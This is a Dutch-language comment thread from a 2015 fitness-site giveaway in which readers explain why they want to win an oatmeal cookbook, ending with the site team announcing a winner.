Zelf probeer ik regelmatig het een en ander uit met havermout omdat ik het leuk vind. echter krijg ik het(met eigen schaamte) voor elkaar om deze gerechten te laten mislukken. Havermoutje zou mij enorm helpen om de havermoutgerechten in 1 keer te laten lukken.

lieke
Door

lieke

op 16 Feb 2015

Omdat ik graag iedereen wil overtuigen dat havermout echt heel lekker kan zijn. Tot nu toe wil mijn vriend het nooit proberen maar wie weet met deze lekkere recepten en mooie plaatjes....

Silvana
Door

Silvana

op 16 Feb 2015

Dat lijkt me nou is echt een leuk boek!! Bij ons gaat er nu al ong 1500 gr havermout doorheen per week misschien dat dat na zo een boek alleen maar meer wordt!!!! Ik zou er wel is wat lekkere dingetjes van willen maken dan standaart water met wat fruit en kaneel!!!!

Kirsten
Door

Kirsten

op 17 Feb 2015

Havermout? Kun je daar dan nog meer mee dan ontbijten dan? Daarom dus! :) Wat inspiratie voor nog meer gezonde dingen in mijn gezin is zeker niet mis met een tafel vol alleseters!!

Susan
Door

Susan

op 17 Feb 2015

Wow wat is het toch een geweldig boek!! Mooie illustraties ook; Ik ben echt ontzettend benieuwd en ik denk dat ik mag spreken voor mijn hele gezin;mijn lieve vriend, ons dochtertje van 7 en zoontje van 1,5; na de geboorte van onze kleine knaap ben ik om; we eten met z'n allen zoveel mogelijk natuurlijke voeding&sporten bijna dagelijks;dat vraagt wel om wat energie! De Kids willen 's morgens zelfs geen brood of croissantje maar...je raad het al: HAVERMOUT!! :-D Ik heb alleen na werk, wassen, school, sport en alle andere heerlijke drukte van het dagelijks leven helaas niet zoveel inspiratie meer en zou toch iedereen hier thuis weer blij willen maken met wat nieuws (lekker&gezond)!! Ik ga duimen! Maar wil jullie sowieso bedanken voor het leuke artikel! Xxx Suus :-)

Dani
Door

Dani

op 19 Feb 2015

HI Susan! Je hebt gewonnen! Gefeliciteerd! Stuur je adresgegevens naar info@fitgirls.nl en dan sturen we het boek naar je toe! Veel plezier ermee! Liefs Team Fitgirls.nl

Toke
Door

Toke

op 17 Feb 2015

Die verdomde blessure... nouja, in ieder geval wel extra tijd om eens lekkere en gezonde recepten uit te proberen

Naomi
Door

Naomi

op 17 Feb 2015

Havermout zorgt ervoor dat ik als ik ga slapen niet kan wachten tot ik weer wakker wordt!

Anna
Door

Anna

op 17 Feb 2015

Ik ben dol op havermout,maar slecht in nieuwe combinaties verzinnen. Ik ben erg nieuwsgierig naar het boek voor nieuwe recepten zodat ik nog lang van de havermout kan genieten!

Maud
Door

Maud

op 17 Feb 2015

I love havermout! En kook graag! Ben vooral erg nieuwsgierig naar de dinerrecepten en recepten die mijn vriend ook zou lusten. Zo raakt hij misschien ook wel verslingerd aan havermout en gezond eten in het algemeen! Dat is brood uhh havermout nodig ;) haha!

mariska
Door

mariska

op 17 Feb 2015

Ik zit vast, vast met ontbijt met havermout, appel, rozijnen en kaneel. Variatie is what i need.

Katinka
Door

Katinka

op 17 Feb 2015

mijn zoon is door zijn ziekte Narcolepsie, veel aangekomen.. We proberen nu met het hele gezin gezond en tóch lekker te eten. Havermout is súpergezond maar ik heb nog niet de juiste gerechten kunnen maken waar hij van smult...

martine
Door

martine

op 17 Feb 2015

Ik zou graag dit boek winnen omdat ik gek ben op havermout en er elke dag mee start als ontbijt. Ik vind het leuk om te varieren en kan wel wat leuke en lekkere nieuwe recepten gebruiken!! :-D

Annerie
Door

Annerie

op 17 Feb 2015

Jaaaaa wat een leuk initiatief! Ik hou van havermout maar kom áltijd weer uit op pap of yoghurt. Ik zou heel graag het boek inkijken. Zo hoop ik ook mijn man zo ver te krijgen dat hij de (vieze) oprolcroissantjes achter zich laat.. Een beetje creativiteit in de keuken zal goed helpen denk ik zo.

Linda
Door

Linda

op 17 Feb 2015

Ik wil gewoon heel graag dit kookboek :)! Ik sport steeds meer en havermout legt altijd een goed bodempje voor een fijne run/workout. Maar kan zeker wat inspiratie gebruiken voor leuke receoten!

Merel
Door

Merel

op 17 Feb 2015

Wat een leuke actie! Ik had het boek al zien liggen in de boekhandel en even doorgebladerd. Ongelofelijk hoeveel je met havermout kunt doen! Het enige dat ik er nu mee maak zijn ontbijtjes met havermout, amandelmelk en kaneel. Het boek zou voor een aangename afwisseling zorgen en hopelijk voor wat nieuwe energie zodat ik helemaal Fit ben om mijn scriptie af te schrijven en een nieuwe baan te zoeken!

Lies
Door

Lies

op 17 Feb 2015

Ik hoor steeds meer mensen over havermout en lees hier ook steeds meer over, in ben ondertussen wel heel benieuwd moet ik zeggen! En dit kookboek maakt echt dat ik nog nieuwsgieriger word!! Het ziet er allemaal zo heerlijk uit :-)

Cinders
Door

Cinders

op 17 Feb 2015

Recent heb ik havermout herontdekt en met dit boek kan ik nog meer havermout gaan eten in mijn nieuwe gebalanceerde leefstijl.

Maartje
Door

Maartje

op 17 Feb 2015

ik ben gek op havermout! Ik bak er zoveel mogelijk dingen mee en ben benieuwd naar wat er allemaal nog meer mogelijk is. Ik gebruik het zelf zo vaak dat mijn vriend het ondertussen de smaak kan herkennen als ik er iets mee gemaakt heb!

Franca
Door

Franca

op 17 Feb 2015

Waarom ik dit boek wil winnen? Je kan zo veel met havermout doen! Ik ben gek op bakken en recepten uit proberen, maar zelf recepten verzinnen ben ik niet zo goed in hihi. Dit boek zou dus enorm handig zijn! Ik ontbijt iedere dag met havermout, en maak er ook vaak meel van als ik aan het bakken ben. Sinds kort ben ik begonnen met het uitbreiden van mijn kookboekencollectie en zou dit boek graag een mooi plekje in m'n keuken willen geven!

Shirley
Door

Shirley

op 17 Feb 2015

Ik ben voor mezelf maar vooral mijn dochtertje van 6 jaar op zoek naar "gezonde" lekkere recepten, ik wil haar op een verantwoorde manier wat lekkers voorschotelen.

Linda
Door

Linda

op 17 Feb 2015

Ik wil gewoon heel graag dit kookboek :)! Ik sport steeds meer en havermout legt altijd een goed bodempje voor een fijne run/workout. Maar kan zeker wat inspiratie gebruiken voor leuke recepten!

Liesbeth
Door

Liesbeth

op 17 Feb 2015

Omdat ik nog niet verder ben gekomen dan havermout in de ontbijtkwark..

Nancy
Door

Nancy

op 17 Feb 2015

Ik ben vorige week begonnen om mijn voedingschema om te gooien, maak nu elke ochtend havermoutpap en doe daar kaneel en kruiden bij! Het is erg lekker, maar om dit recept nu nog weken te gaan eten zie ik niet zo zitten.. En omdat er heel veel meer ontbijtjes zijn met havermout maar ik zelf geen idee heb welke & wel heeeel graan havermout wil blijven eten om weer op mijn oude gewicht te komen "-10" lijkt mij dit de uitgelezen kans om aan het boek te komen

stefanie
Door

stefanie

op 17 Feb 2015

Ik vind het een geweldig concept. Om zoveel met havermout te doen, super gezond en lekker. Je wordt alleen maar geïnspireerd door ze. Dus dit boek moet bij mij in de collectie terecht komen. Ik wil heel graag mijn lief 's ochtends verwennen met een heerlijk havermout ontbijtje. maar dan heb ik wel het receptenboek nodig :)

Veronica
Door

Veronica

op 17 Feb 2015

Dit boek lijkt me een hele gave inspiratie bron om nieuwe lekkere dingen te maken met havermout. Ik deed laatst mee met een 30dagen challange en heb deze goed volgehouden, hierin kennis gemaakt met havermout (in bananenpannekoeken) en nu nieuwsgierig naar wat je eigenlijk allemaal kan met havermout!

Colinda
Door

Colinda

op 18 Feb 2015

Ik zoek de laatste tijd allerlei recept variaties met havermout, en dit boek zou een uitkomst bieden!

Eva
Door

Eva

op 18 Feb 2015

Ik eet glutenvrij en Fodmap- en histaminebeperkt, en heb veel moeite om nog lekkere en gezonde dingen te vinden die ik mag eten. Gelukkig kan ik wel haver eten, maar ik eet eigenlijk altijd dezelfde dingen. Lijkt me super om variaties te vinden! En zo veel keus!

Rachel
Door

Rachel

op 19 Feb 2015

Havermout is superlekker, ik eet het elke dag. Verder dan de totaal verslavende havermoutkoekjes en havermoutpannenkoekjes ben ik nog niet gekomen. Ik ben ontzettend benieuwd naar alle andere variaties die in het boek staan! Nu lekker aan mijn beetje late havermoutontbijtje en in spanning afwachten of er een boek mijn kant op komt ☺️

eva
Door

eva

op 19 Feb 2015

havermout voor ontbijt havermout voor lunch en guess what...havermout voor diner....het is een verslaving. ik kan wel wat variatietips gebruiken!

Olivia
Door

Olivia

op 19 Feb 2015

Omdat dit perfecte boek hier in Zwitserland helaas niet verkrijgbaar is! :'(

Anita H.
Door

Anita H.

op 21 Feb 2015

De recente enorm positieve berichten over het eten havermout zijn me niet ontgaan. Ik heb er veel voor over om gezond door het leven te gaan. Gezonde voeding heeft al jaren mijn belangstelling en ik ben mijns inziens ook goed bezig (geen tarwe; geen zuivel; geen toegevoegde suiker; puur). Eerlijk gezegd heb ik nog nooit havermout gegeten. Dat leek me eigenlijk ook niet zo smakelijk. Dankzij de vele recepten die ik via blogs en zo op internet voorbij zie komen, is mijn interesse wel gewekt. Vooral interessant als ontbijt (dat voor mij tot nu toe weinig variatie kent). Dit te winnen boek stond sowieso al op mijn wensenlijst.

Reactie plaatsen
arrow_drop_up arrow_drop_down